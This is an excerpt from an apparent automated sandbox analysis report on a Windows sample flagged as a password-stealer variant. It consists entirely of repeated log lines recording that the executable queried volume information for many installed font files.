                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
